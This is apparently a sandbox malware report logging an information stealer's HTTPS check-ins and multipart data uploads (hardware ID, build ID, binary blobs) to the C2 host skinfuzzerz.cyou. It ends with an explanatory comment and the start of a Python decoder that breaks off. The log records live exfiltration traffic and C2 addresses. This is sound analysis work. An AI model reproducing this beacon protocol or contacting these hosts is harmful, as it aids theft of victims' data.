Jan 7, 2025 14:48:23.759577990 CET | 1.1.1.1 | 192.168.2.4 | 0xdba5 | No error (0) | skinfuzzerz.cyou | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:23.759577990 CET | 1.1.1.1 | 192.168.2.4 | 0xdba5 | No error (0) | skinfuzzerz.cyou | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:35.606009960 CET | 1.1.1.1 | 192.168.2.4 | 0x900f | No error (0) | cegu.shop | | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:36.935179949 CET | 1.1.1.1 | 192.168.2.4 | 0xc574 | Name error (3) | klipvumisui.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:37.870748043 CET | 1.1.1.1 | 192.168.2.4 | 0xa417 | Name error (3) | dfgh.online | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 14:48:38.495732069 CET | 1.1.1.1 | 192.168.2.4 | 0xee9c | Name error (3) | 241.42.69.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false

• skinfuzzerz.cyou
• cegu.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe

Timestamp | Bytes transferred | Direction | Data

2025-01-07 13:48:24 UTC | 263 | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: skinfuzzerz.cyou

2025-01-07 13:48:24 UTC | 8 | OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life

2025-01-07 13:48:24 UTC | 1125 | IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=jh3880fj0qnntfhkqrkc6730ir; expires=Sat, 03 May 2025 07:35:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UP4VDDS%2Bx4%2BbpFEsv3NEK5mxMg15IwXe6skNHtvrvpbAYeQo82Sbch4UVZDOIB%2B8C%2FacaMyx%2BI71I9KvwcYgteCNsZrqh1Byjr7fzzFE6oBzILgr0JoIm0cpoXPoe1VjQ7xr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe467bc6912c434-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1487&rtt_var=562&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=907&delivery_rate=1963685&cwnd=196&unsent_bytes=0&cid=c370679c420aa62d&ts=521&x=0"

2025-01-07 13:48:24 UTC | 7 | IN
Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok

2025-01-07 13:48:24 UTC | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe

Timestamp | Bytes transferred | Direction | Data

2025-01-07 13:48:25 UTC | 264 | OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: skinfuzzerz.cyou

2025-01-07 13:48:25 UTC | 80 | OUT
Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d

2025-01-07 13:48:25 UTC | 1125 | IN
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=7f94c0eb9jmkra27fvhbrqcgd8; expires=Sat, 03 May 2025 07:35:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hf73ft5oUhhmS69CwnRj6d%2FxzShyHwpCAanibcObYIctgwFXXxCUAVZhW36ks%2F9zggbh%2BlbZyuD4%2B3Zug89eGhNsYRw8GWsEbp%2FZkCJl2WpwNHLXCEhLScZ019z8H4QoGvP2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467c278c8c356-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1679&rtt_var=657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=980&delivery_rate=1633109&cwnd=153&unsent_bytes=0&cid=4911e402b190b42c&ts=481&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:48:26 UTC | 274 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=R0WF7AGPFE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18116
Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:26 UTC15331OUTData Raw: 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                            Data Ascii: --R0WF7AGPFEContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--R0WF7AGPFEContent-Disposition: form-data; name="pid"2--R0WF7AGPFEContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--R0WF7AGPFEContent
                                                                                                                                                            2025-01-07 13:48:26 UTC2785OUTData Raw: 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6
                                                                                                                                                            Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
2025-01-07 13:48:28 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=3iqhfe90qkd9npckkn0l159c6m; expires=Sat, 03 May 2025 07:35:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rI2vk1QjMhGMzF7ox9WwStC9P5XQqIcWdaqHOlNNIbrlPB5KNn%2BCqq8virjZNBO2gprPkmWUvd%2FSDzkcs0n6CtHYTZ1W8hID2zgcTtDPE40EsQexhpGbIh2A1JKgPeBSvoqh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe467c94e5a42fd-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1582&rtt_var=629&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19070&delivery_rate=1690793&cwnd=248&unsent_bytes=0&cid=b196c739781ee7aa&ts=991&x=0"
2025-01-07 13:48:28 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 13:48:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:48:28 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=J3TIF90L1DDF8I5WY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8779
Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:28 UTC8779OUTData Raw: 2d 2d 4a 33 54 49 46 39 30 4c 31 44 44 46 38 49 35 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 4a 33 54 49 46 39 30 4c 31 44 44 46 38 49 35 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 33 54 49 46 39 30 4c 31 44 44 46 38 49 35 57 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a
                                                                                                                                                            Data Ascii: --J3TIF90L1DDF8I5WYContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--J3TIF90L1DDF8I5WYContent-Disposition: form-data; name="pid"2--J3TIF90L1DDF8I5WYContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA
2025-01-07 13:48:29 UTC | 1124 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4cg6m4l6g2c15hd7lv48lqu1bm; expires=Sat, 03 May 2025 07:35:08 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugbouBhYZYehpGDdfGtpWuLNAdR29MTv0%2F6ug5vjxU1sn3e0Iku7Tu7egDdlmz4FO8DjStvso%2F2Z1l7wwYuYJ0QSsjIyo9ot%2F%2BeUsVnOm1jSAIjAepeyaLAgeDpRC3JW3Y5F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe467d8dd150f67-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1557&rtt_var=604&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9717&delivery_rate=1781574&cwnd=47&unsent_bytes=0&cid=6f3bb75b151d85d8&ts=539&x=0"
2025-01-07 13:48:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                            2025-01-07 13:48:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49754 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:48:30 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=1BP8P7DHDMKP0OSWR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 20432
Host: skinfuzzerz.cyou
2025-01-07 13:48:30 UTC | 15331 | OUT | Data Raw: 2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a
Data Ascii: --1BP8P7DHDMKP0OSWRContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--1BP8P7DHDMKP0OSWRContent-Disposition: form-data; name="pid"3--1BP8P7DHDMKP0OSWRContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA
2025-01-07 13:48:30 UTC | 5101 | OUT | Data Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00
Data Ascii: `M?lrQMn 64F6(X&7~`aO
2025-01-07 13:48:31 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=r9m18o0m019e2ppedpgpub50od; expires=Sat, 03 May 2025 07:35:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yul9YOj4IztRIw7F86c%2FN0jT%2B44hJVaarGmEfsqPSvmKO9wZFMtEKBX4Kpf85ArmN6v8PBjRIdgj5iiwC1EfN4SLmTldkfsB5W2huh23gaeNrtQ7pIFvxazuOupVvQVXpbTi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe467e06ce34299-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1705&rtt_var=654&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21393&delivery_rate=1653454&cwnd=251&unsent_bytes=0&cid=71a1cbfa162a9647&ts=926&x=0"
2025-01-07 13:48:31 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 13:48:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49755 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:48:33 UTC | 271 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9JWW0VJD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1212
Host: skinfuzzerz.cyou
2025-01-07 13:48:33 UTC | 1212 | OUT | Data Raw: 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 39 4a 57 57 30 56 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
Data Ascii: --9JWW0VJDContent-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--9JWW0VJDContent-Disposition: form-data; name="pid"1--9JWW0VJDContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--9JWW0VJDContent-Disposi
2025-01-07 13:48:33 UTC | 1118 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=pe2sp0me2vq8dickd5v8r3tdgf; expires=Sat, 03 May 2025 07:35:12 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nGVdwuKdK9XH5vhkYVIwSxmbkZPZ30LpO3MdbQTcODsIJmSKxpvNvcHtS2xPVPJye79JlTWOkI4vP5Loe73KSqYzY8eUrtWu977D%2F0K12gEyaCutK9FgYGXjm2fdjrUuB4YU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe467f2daa57d1e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1987&rtt_var=754&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2119&delivery_rate=1444114&cwnd=192&unsent_bytes=0&cid=297e0307b78ddeb6&ts=440&x=0"
2025-01-07 13:48:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 13:48:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49756 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:48:34 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=VW51LKHI38YBQKGO44
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1104
Host: skinfuzzerz.cyou
2025-01-07 13:48:34 UTC | 1104 | OUT | Data Raw: 2d 2d 56 57 35 31 4c 4b 48 49 33 38 59 42 51 4b 47 4f 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 56 57 35 31 4c 4b 48 49 33 38 59 42 51 4b 47 4f 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 57 35 31 4c 4b 48 49 33 38 59 42 51 4b 47 4f 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52
Data Ascii: --VW51LKHI38YBQKGO44Content-Disposition: form-data; name="hwid"8CB2E1475A80558D4F56F59586ABF308--VW51LKHI38YBQKGO44Content-Disposition: form-data; name="pid"1--VW51LKHI38YBQKGO44Content-Disposition: form-data; name="lid"hRjzG3--ELVIR
2025-01-07 13:48:34 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=qbqbf0o09g9h0t433bd7l7qhfe; expires=Sat, 03 May 2025 07:35:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPLSt7m2lvO63AxA1FIpA4zGaNVXgM%2FmsY2HET4%2B8atmRj6UuUirRXl722WukJ5sffNgvL26D1bIhK9g6EYIWbna%2Bu5D%2BVBEz8ZPT4kYdLImBw%2FFkfAyWSqcuy4rEAVQFYy1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe467f928767d05-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2019&rtt_var=772&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2021&delivery_rate=1403846&cwnd=195&unsent_bytes=0&cid=81f0b488f586bb9d&ts=519&x=0"
2025-01-07 13:48:34 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 13:48:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
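Sessions 4 to 6 above carry the same beacon: a multipart/form-data POST to /api whose parts are hwid, pid and lid, and every one of them gets back a chunked body whose only payload is "ok 8.46.123.189" (the "f" in the Data Ascii column is the hex chunk size, not part of the reply). Session 7 below switches to an application/x-www-form-urlencoded act=get_message request that carries the same hwid and lid. The Python that follows decodes exactly those bytes from the Data Raw columns. It is an added example written for this page, not code from the Joe Sandbox report or from the sample: the hex constants are copied from the report, and every function name (parse_multipart, parse_chunked, decode_multipart_checkin, decode_get_message, decode_reply, correlation_keys) is the example's own. Because the report truncates long Data Raw rows (session 5's ends inside "Content-Disposi"), the multipart parser tolerates a missing closing boundary and drops a part that is cut inside its headers.

```python
"""Decode the LummaC /api check-in traffic captured in this report.

Added example: not part of the Joe Sandbox report and not code from the sample.
The hex constants are copied from the report's "Data Raw" columns; every
function here is the example's own.
"""
import re
from urllib.parse import parse_qsl

# Session 4 request body (multipart/form-data). The report cuts the row after
# the "lid" part, so there is no closing "--boundary--" delimiter.
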